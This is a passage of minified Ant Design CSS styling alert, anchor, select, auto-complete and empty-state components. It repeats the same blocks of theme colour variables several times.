margin-left: 8px; padding: 0; overflow: hidden; font-size: 12px; line-height: 12px; background-color: transparent; border: none; outline: none; cursor: pointer; } .ant-alert-close-icon .anticon-close { color: rgba(0, 0, 0, 0.45); transition: color 0.3s; } .ant-alert-close-icon .anticon-close:hover { color: rgba(0, 0, 0, 0.75); } .ant-alert-close-text { color: rgba(0, 0, 0, 0.45); transition: color 0.3s; } .ant-alert-close-text:hover { color: rgba(0, 0, 0, 0.75); } .ant-alert-with-description { align-items: flex-start; padding: 15px 15px 15px 24px; } .ant-alert-with-description.ant-alert-no-icon { padding: 15px 15px; } .ant-alert-with-description .ant-alert-icon { margin-right: 15px; font-size: 24px; } .ant-alert-with-description .ant-alert-message { display: block; margin-bottom: 4px; color: rgba(0, 0, 0, 0.85); font-size: 16px; } .ant-alert-message { color: rgba(0, 0, 0, 0.85); } .ant-alert-with-description .ant-alert-description { display: block; } .ant-alert.ant-alert-motion-leave { overflow: hidden; opacity: 1; transition: max-height 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86), opacity 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86), padding-top 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86), padding-bottom 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86), margin-bottom 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-alert.ant-alert-motion-leave-active { max-height: 0; margin-bottom: 0 !important; padding-top: 0; padding-bottom: 0; opacity: 0; } .ant-alert-banner { margin-bottom: 0; border: 0; border-radius: 0; } .ant-alert.ant-alert-rtl { direction: rtl; } .ant-alert-rtl .ant-alert-icon { margin-right: auto; margin-left: 8px; } .ant-alert-rtl .ant-alert-action { margin-right: 8px; margin-left: auto; } .ant-alert-rtl .ant-alert-close-icon { margin-right: 8px; margin-left: auto; } .ant-alert-rtl.ant-alert-with-description { padding-right: 24px; padding-left: 15px; } .ant-alert-rtl.ant-alert-with-description .ant-alert-icon { margin-right: auto; margin-left: 15px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-anchor { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; padding-left: 2px; } .ant-anchor-wrapper { margin-left: -4px; padding-left: 4px; overflow: auto; background-color: transparent; } .ant-anchor-ink { position: absolute; top: 0; left: 0; height: 100%; } .ant-anchor-ink::before { position: relative; display: block; width: 2px; height: 100%; margin: 0 auto; background-color: #f0f0f0; content: ' '; } .ant-anchor-ink-ball { position: absolute; left: 50%; display: none; width: 8px; height: 8px; background-color: #fff; border: 2px solid var(--ant-primary-color); border-radius: 8px; transform: translateX(-50%); transition: top 0.3s ease-in-out; } .ant-anchor-ink-ball.visible { display: inline-block; } .ant-anchor-fixed .ant-anchor-ink .ant-anchor-ink-ball { display: none; } .ant-anchor-link { padding: 7px 0 7px 16px; line-height: 1.143; } .ant-anchor-link-title { position: relative; display: block; margin-bottom: 6px; overflow: hidden; color: rgba(0, 0, 0, 0.85); white-space: nowrap; text-overflow: ellipsis; transition: all 0.3s; } .ant-anchor-link-title:only-child { margin-bottom: 0; } .ant-anchor-link-active > .ant-anchor-link-title { color: var(--ant-primary-color); } .ant-anchor-link .ant-anchor-link { padding-top: 5px; padding-bottom: 5px; } .ant-anchor-rtl { direction: rtl; } .ant-anchor-rtl.ant-anchor-wrapper { margin-right: -4px; margin-left: 0; padding-right: 4px; padding-left: 0; } .ant-anchor-rtl .ant-anchor-ink { right: 0; left: auto; } .ant-anchor-rtl .ant-anchor-ink-ball { right: 50%; left: 0; transform: translateX(50%); } .ant-anchor-rtl .ant-anchor-link { padding: 7px 16px 7px 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-select-auto-complete { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; } .ant-select-auto-complete .ant-select-clear { right: 13px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-select-single .ant-select-selector { display: flex; } .ant-select-single .ant-select-selector .ant-select-selection-search { position: absolute; top: 0; right: 11px; bottom: 0; left: 11px; } .ant-select-single .ant-select-selector .ant-select-selection-search-input { width: 100%; } .ant-select-single .ant-select-selector .ant-select-selection-item, .ant-select-single .ant-select-selector .ant-select-selection-placeholder { padding: 0; line-height: 30px; transition: all 0.3s; } @supports (-moz-appearance: meterbar) { .ant-select-single .ant-select-selector .ant-select-selection-item, .ant-select-single .ant-select-selector .ant-select-selection-placeholder { line-height: 30px; } } .ant-select-single .ant-select-selector .ant-select-selection-item { position: relative; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-select-single .ant-select-selector .ant-select-selection-placeholder { transition: none; pointer-events: none; } .ant-select-single .ant-select-selector::after, .ant-select-single .ant-select-selector .ant-select-selection-item::after, .ant-select-single .ant-select-selector .ant-select-selection-placeholder::after { display: inline-block; width: 0; visibility: hidden; content: '\a0'; } .ant-select-single.ant-select-show-arrow .ant-select-selection-search { right: 25px; } .ant-select-single.ant-select-show-arrow .ant-select-selection-item, .ant-select-single.ant-select-show-arrow .ant-select-selection-placeholder { padding-right: 18px; } .ant-select-single.ant-select-open .ant-select-selection-item { color: #bfbfbf; } .ant-select-single:not(.ant-select-customize-input) .ant-select-selector { width: 100%; height: 32px; padding: 0 11px; } .ant-select-single:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-search-input { height: 30px; } .ant-select-single:not(.ant-select-customize-input) .ant-select-selector::after { line-height: 30px; } .ant-select-single.ant-select-customize-input .ant-select-selector::after { display: none; } .ant-select-single.ant-select-customize-input .ant-select-selector .ant-select-selection-search { position: static; width: 100%; } .ant-select-single.ant-select-customize-input .ant-select-selector .ant-select-selection-placeholder { position: absolute; right: 0; left: 0; padding: 0 11px; } .ant-select-single.ant-select-customize-input .ant-select-selector .ant-select-selection-placeholder::after { display: none; } .ant-select-single.ant-select-lg:not(.ant-select-customize-input) .ant-select-selector { height: 40px; } .ant-select-single.ant-select-lg:not(.ant-select-customize-input) .ant-select-selector::after, .ant-select-single.ant-select-lg:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-item, .ant-select-single.ant-select-lg:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-placeholder { line-height: 38px; } .ant-select-single.ant-select-lg:not(.ant-select-customize-input):not(.ant-select-customize-input) .ant-select-selection-search-input { height: 38px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input) .ant-select-selector { height: 24px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input) .ant-select-selector::after, .ant-select-single.ant-select-sm:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-item, .ant-select-single.ant-select-sm:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-placeholder { line-height: 22px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input):not(.ant-select-customize-input) .ant-select-selection-search-input { height: 22px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input) .ant-select-selection-search { right: 7px; left: 7px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input) .ant-select-selector { padding: 0 7px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input).ant-select-show-arrow .ant-select-selection-search { right: 28px; } .ant-select-single.ant-select-sm:not(.ant-select-customize-input).ant-select-show-arrow .ant-select-selection-item, .ant-select-single.ant-select-sm:not(.ant-select-customize-input).ant-select-show-arrow .ant-select-selection-placeholder { padding-right: 21px; } .ant-select-single.ant-select-lg:not(.ant-select-customize-input) .ant-select-selector { padding: 0 11px; } /** * Do not merge `height` & `line-height` under style with `selection` & `search`, * since chrome may update to redesign with its align logic. */ .ant-select-selection-overflow { position: relative; display: flex; flex: auto; flex-wrap: wrap; max-width: 100%; } .ant-select-selection-overflow-item { flex: none; align-self: center; max-width: 100%; } .ant-select-multiple .ant-select-selector { display: flex; flex-wrap: wrap; align-items: center; padding: 1px 4px; } .ant-select-show-search.ant-select-multiple .ant-select-selector { cursor: text; } .ant-select-disabled.ant-select-multiple .ant-select-selector { background: #f5f5f5; cursor: not-allowed; } .ant-select-multiple .ant-select-selector::after { display: inline-block; width: 0; margin: 2px 0; line-height: 24px; content: '\a0'; } .ant-select-multiple.ant-select-show-arrow .ant-select-selector, .ant-select-multiple.ant-select-allow-clear .ant-select-selector { padding-right: 24px; } .ant-select-multiple .ant-select-selection-item { position: relative; display: flex; flex: none; box-sizing: border-box; max-width: 100%; height: 24px; margin-top: 2px; margin-bottom: 2px; line-height: 22px; background: #f5f5f5; border: 1px solid #f0f0f0; border-radius: 2px; cursor: default; transition: font-size 0.3s, line-height 0.3s, height 0.3s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-margin-end: 4px; margin-inline-end: 4px; -webkit-padding-start: 8px; padding-inline-start: 8px; -webkit-padding-end: 4px; padding-inline-end: 4px; } .ant-select-disabled.ant-select-multiple .ant-select-selection-item { color: #bfbfbf; border-color: #d9d9d9; cursor: not-allowed; } .ant-select-multiple .ant-select-selection-item-content { display: inline-block; margin-right: 4px; overflow: hidden; white-space: pre; text-overflow: ellipsis; } .ant-select-multiple .ant-select-selection-item-remove { color: inherit; font-style: normal; line-height: 0; text-align: center; text-transform: none; vertical-align: -0.125em; text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; display: inline-block; color: rgba(0, 0, 0, 0.45); font-weight: bold; font-size: 10px; line-height: inherit; cursor: pointer; } .ant-select-multiple .ant-select-selection-item-remove > * { line-height: 1; } .ant-select-multiple .ant-select-selection-item-remove svg { display: inline-block; } .ant-select-multiple .ant-select-selection-item-remove::before { display: none; } .ant-select-multiple .ant-select-selection-item-remove .ant-select-multiple .ant-select-selection-item-remove-icon { display: block; } .ant-select-multiple .ant-select-selection-item-remove > .anticon { vertical-align: -0.2em; } .ant-select-multiple .ant-select-selection-item-remove:hover { color: rgba(0, 0, 0, 0.75); } .ant-select-multiple .ant-select-selection-overflow-item + .ant-select-selection-overflow-item .ant-select-selection-search { -webkit-margin-start: 0; margin-inline-start: 0; } .ant-select-multiple .ant-select-selection-search { position: relative; max-width: 100%; margin-top: 2px; margin-bottom: 2px; -webkit-margin-start: 7px; margin-inline-start: 7px; } .ant-select-multiple .ant-select-selection-search-input, .ant-select-multiple .ant-select-selection-search-mirror { height: 24px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; line-height: 24px; transition: all 0.3s; } .ant-select-multiple .ant-select-selection-search-input { width: 100%; min-width: 4.1px; } .ant-select-multiple .ant-select-selection-search-mirror { position: absolute; top: 0; left: 0; z-index: 999; white-space: pre; visibility: hidden; } .ant-select-multiple .ant-select-selection-placeholder { position: absolute; top: 50%; right: 11px; left: 11px; transform: translateY(-50%); transition: all 0.3s; } .ant-select-multiple.ant-select-lg .ant-select-selector::after { line-height: 32px; } .ant-select-multiple.ant-select-lg .ant-select-selection-item { height: 32px; line-height: 30px; } .ant-select-multiple.ant-select-lg .ant-select-selection-search { height: 32px; line-height: 32px; } .ant-select-multiple.ant-select-lg .ant-select-selection-search-input, .ant-select-multiple.ant-select-lg .ant-select-selection-search-mirror { height: 32px; line-height: 30px; } .ant-select-multiple.ant-select-sm .ant-select-selector::after { line-height: 16px; } .ant-select-multiple.ant-select-sm .ant-select-selection-item { height: 16px; line-height: 14px; } .ant-select-multiple.ant-select-sm .ant-select-selection-search { height: 16px; line-height: 16px; } .ant-select-multiple.ant-select-sm .ant-select-selection-search-input, .ant-select-multiple.ant-select-sm .ant-select-selection-search-mirror { height: 16px; line-height: 14px; } .ant-select-multiple.ant-select-sm .ant-select-selection-placeholder { left: 7px; } .ant-select-multiple.ant-select-sm .ant-select-selection-search { -webkit-margin-start: 3px; margin-inline-start: 3px; } .ant-select-multiple.ant-select-lg .ant-select-selection-item { height: 32px; line-height: 32px; } .ant-select-disabled .ant-select-selection-item-remove { display: none; } /* Reset search input style */ .ant-select { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: inline-block; cursor: pointer; } .ant-select:not(.ant-select-customize-input) .ant-select-selector { position: relative; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-select:not(.ant-select-customize-input) .ant-select-selector input { cursor: pointer; } .ant-select-show-search.ant-select:not(.ant-select-customize-input) .ant-select-selector { cursor: text; } .ant-select-show-search.ant-select:not(.ant-select-customize-input) .ant-select-selector input { cursor: auto; } .ant-select-focused:not(.ant-select-disabled).ant-select:not(.ant-select-customize-input) .ant-select-selector { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-select-disabled.ant-select:not(.ant-select-customize-input) .ant-select-selector { color: rgba(0, 0, 0, 0.25); background: #f5f5f5; cursor: not-allowed; } .ant-select-multiple.ant-select-disabled.ant-select:not(.ant-select-customize-input) .ant-select-selector { background: #f5f5f5; } .ant-select-disabled.ant-select:not(.ant-select-customize-input) .ant-select-selector input { cursor: not-allowed; } .ant-select:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-search-input { margin: 0; padding: 0; background: transparent; border: none; outline: none; -webkit-appearance: none; -moz-appearance: none; appearance: none; } .ant-select:not(.ant-select-customize-input) .ant-select-selector .ant-select-selection-search-input::-webkit-search-cancel-button { display: none; /* stylelint-disable-next-line property-no-vendor-prefix */ -webkit-appearance: none; } .ant-select:not(.ant-select-disabled):hover .ant-select-selector { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-select-selection-item { flex: 1; overflow: hidden; font-weight: normal; white-space: nowrap; text-overflow: ellipsis; } @media all and (-ms-high-contrast: none) { .ant-select-selection-item *::-ms-backdrop, .ant-select-selection-item { flex: auto; } } .ant-select-selection-placeholder { flex: 1; overflow: hidden; color: #bfbfbf; white-space: nowrap; text-overflow: ellipsis; pointer-events: none; } @media all and (-ms-high-contrast: none) { .ant-select-selection-placeholder *::-ms-backdrop, .ant-select-selection-placeholder { flex: auto; } } .ant-select-arrow { display: inline-block; color: inherit; font-style: normal; line-height: 0; text-transform: none; vertical-align: -0.125em; text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; position: absolute; top: 50%; right: 11px; width: 12px; height: 12px; margin-top: -6px; color: rgba(0, 0, 0, 0.25); font-size: 12px; line-height: 1; text-align: center; pointer-events: none; } .ant-select-arrow > * { line-height: 1; } .ant-select-arrow svg { display: inline-block; } .ant-select-arrow::before { display: none; } .ant-select-arrow .ant-select-arrow-icon { display: block; } .ant-select-arrow .anticon { vertical-align: top; transition: transform 0.3s; } .ant-select-arrow .anticon > svg { vertical-align: top; } .ant-select-arrow .anticon:not(.ant-select-suffix) { pointer-events: auto; } .ant-select-disabled .ant-select-arrow { cursor: not-allowed; } .ant-select-clear { position: absolute; top: 50%; right: 11px; z-index: 1; display: inline-block; width: 12px; height: 12px; margin-top: -6px; color: rgba(0, 0, 0, 0.25); font-size: 12px; font-style: normal; line-height: 1; text-align: center; text-transform: none; background: #fff; cursor: pointer; opacity: 0; transition: color 0.3s ease, opacity 0.15s ease; text-rendering: auto; } .ant-select-clear::before { display: block; } .ant-select-clear:hover { color: rgba(0, 0, 0, 0.45); } .ant-select:hover .ant-select-clear { opacity: 1; } .ant-select-dropdown { margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; top: -9999px; left: -9999px; z-index: 1050; box-sizing: border-box; padding: 4px 0; overflow: hidden; font-size: 14px; font-variant: initial; background-color: #fff; border-radius: 2px; outline: none; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-select-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-select-dropdown-placement-bottomLeft, .ant-select-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-select-dropdown-placement-bottomLeft { -webkit-animation-name: antSlideUpIn; animation-name: antSlideUpIn; } .ant-select-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-select-dropdown-placement-topLeft, .ant-select-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-select-dropdown-placement-topLeft { -webkit-animation-name: antSlideDownIn; animation-name: antSlideDownIn; } .ant-select-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-select-dropdown-placement-bottomLeft { -webkit-animation-name: antSlideUpOut; animation-name: antSlideUpOut; } .ant-select-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-select-dropdown-placement-topLeft { -webkit-animation-name: antSlideDownOut; animation-name: antSlideDownOut; } .ant-select-dropdown-hidden { display: none; } .ant-select-dropdown-empty { color: rgba(0, 0, 0, 0.25); } .ant-select-item-empty { position: relative; display: block; min-height: 32px; padding: 5px 12px; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; line-height: 22px; color: rgba(0, 0, 0, 0.25); } .ant-select-item { position: relative; display: block; min-height: 32px; padding: 5px 12px; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; line-height: 22px; cursor: pointer; transition: background 0.3s ease; } .ant-select-item-group { color: rgba(0, 0, 0, 0.45); font-size: 12px; cursor: default; } .ant-select-item-option { display: flex; } .ant-select-item-option-content { flex: auto; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-select-item-option-state { flex: none; } .ant-select-item-option-active:not(.ant-select-item-option-disabled) { background-color: #f5f5f5; } .ant-select-item-option-selected:not(.ant-select-item-option-disabled) { color: rgba(0, 0, 0, 0.85); font-weight: 600; background-color: var(--ant-primary-1); } .ant-select-item-option-selected:not(.ant-select-item-option-disabled) .ant-select-item-option-state { color: var(--ant-primary-color); } .ant-select-item-option-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-select-item-option-disabled.ant-select-item-option-selected { background-color: #f5f5f5; } .ant-select-item-option-grouped { padding-left: 24px; } .ant-select-lg { font-size: 16px; } .ant-select-borderless .ant-select-selector { background-color: transparent !important; border-color: transparent !important; box-shadow: none !important; } .ant-select-rtl { direction: rtl; } .ant-select-rtl .ant-select-arrow { right: initial; left: 11px; } .ant-select-rtl .ant-select-clear { right: initial; left: 11px; } .ant-select-dropdown-rtl { direction: rtl; } .ant-select-dropdown-rtl .ant-select-item-option-grouped { padding-right: 24px; padding-left: 12px; } .ant-select-rtl.ant-select-multiple.ant-select-show-arrow .ant-select-selector, .ant-select-rtl.ant-select-multiple.ant-select-allow-clear .ant-select-selector { padding-right: 4px; padding-left: 24px; } .ant-select-rtl.ant-select-multiple .ant-select-selection-item { text-align: right; } .ant-select-rtl.ant-select-multiple .ant-select-selection-item-content { margin-right: 0; margin-left: 4px; text-align: right; } .ant-select-rtl.ant-select-multiple .ant-select-selection-search-mirror { right: 0; left: auto; } .ant-select-rtl.ant-select-multiple .ant-select-selection-placeholder { right: 11px; left: auto; } .ant-select-rtl.ant-select-multiple.ant-select-sm .ant-select-selection-placeholder { right: 7px; } .ant-select-rtl.ant-select-single .ant-select-selector .ant-select-selection-item, .ant-select-rtl.ant-select-single .ant-select-selector .ant-select-selection-placeholder { right: 0; left: 9px; text-align: right; } .ant-select-rtl.ant-select-single.ant-select-show-arrow .ant-select-selection-search { right: 11px; left: 25px; } .ant-select-rtl.ant-select-single.ant-select-show-arrow .ant-select-selection-item, .ant-select-rtl.ant-select-single.ant-select-show-arrow .ant-select-selection-placeholder { padding-right: 0; padding-left: 18px; } .ant-select-rtl.ant-select-single.ant-select-sm:not(.ant-select-customize-input).ant-select-show-arrow .ant-select-selection-search { right: 6px; } .ant-select-rtl.ant-select-single.ant-select-sm:not(.ant-select-customize-input).ant-select-show-arrow .ant-select-selection-item, .ant-select-rtl.ant-select-single.ant-select-sm:not(.ant-select-customize-input).ant-select-show-arrow .ant-select-selection-placeholder { padding-right: 0; padding-left: 21px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-empty { margin: 0 8px; font-size: 14px; line-height: 1.5715; text-align: center; } .ant-empty-image { height: 100px; margin-bottom: 8px; } .ant-empty-image img { height: 100%; } .ant-empty-image svg { height: 100%; margin: auto; } .ant-empty-footer { margin-top: 16px; } .ant-empty-normal { margin: 32px 0; color: rgba(0, 0, 0, 0.25); } .ant-empty-normal .ant-empty-image { height: 40px; } .ant-empty-small { margin: 8px 0; color: rgba(0, 0, 0, 0.25); } .ant-empty-small .ant-empty-image { height: 35px; } .ant-empty-img-default-ellipse { fill: #f5f5f5; fill-opacity: 0.8; } .ant-empty-img-default-path-1 { fill: #aeb8c2; } .ant-empty-img-default-path-2 { fill: url('#linearGradient-1'); } .ant-empty-img-default-path-3 { fill: #f5f5f7; } .ant-empty-img-default-path-4 { fill: #dce0e6; } .ant-empty-img-default-path-5 { fill: #dce0e6; } .ant-empty-img-default-g { fill: #fff; } .ant-empty-img-simple-ellipse { fill: #f5f5f5; } .ant-empty-img-simple-g { stroke: #d9d9d9; } .ant-empty-img-simple-path { fill: #fafafa; } .ant-empty-rtl { direction: rtl; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: 